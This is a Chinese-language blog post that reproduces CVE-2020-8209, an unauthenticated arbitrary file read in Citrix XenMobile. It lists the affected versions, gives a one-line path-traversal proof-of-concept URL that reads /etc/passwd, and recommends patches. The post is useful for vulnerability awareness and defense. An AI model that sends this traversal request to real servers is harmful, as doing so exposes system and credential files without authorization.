我是靠谱客的博主 多情草丛,这篇文章主要介绍Citrix Endpoint Management 任意文件读取(CVE-2020-8209)复现漏洞描述影响版本 漏洞复现 修补建议,现在分享给大家,希望可以做个参考。
漏洞描述
XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。
Citrix Endpoint Management 存在 任意文件读取漏洞,远程未授权攻击者 通过 发送特制HTTP请求,可以造成 读取受影响设备上任意文件 的影响。
影响版本
RP2之前的XenMobile服务器10.12
RP4之前的XenMobile服务器10.11
RP6之前的XenMobile服务器10.10
10.9 RP5之前的XenMobile服务器控制台界面
漏洞复现
poc
http://your-ip/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
查看后,成功
修补建议
根据版本安装修补程序
XenMobile Server 10.12 RP3 XenMobile Server 10.11 RP6 XenMobile Server 10.10 RP6 XenMobile Server 10.9 RP5
最后
以上就是多情草丛最近收集整理的关于Citrix Endpoint Management 任意文件读取(CVE-2020-8209)复现漏洞描述影响版本 漏洞复现 修补建议的全部内容,更多相关Citrix内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复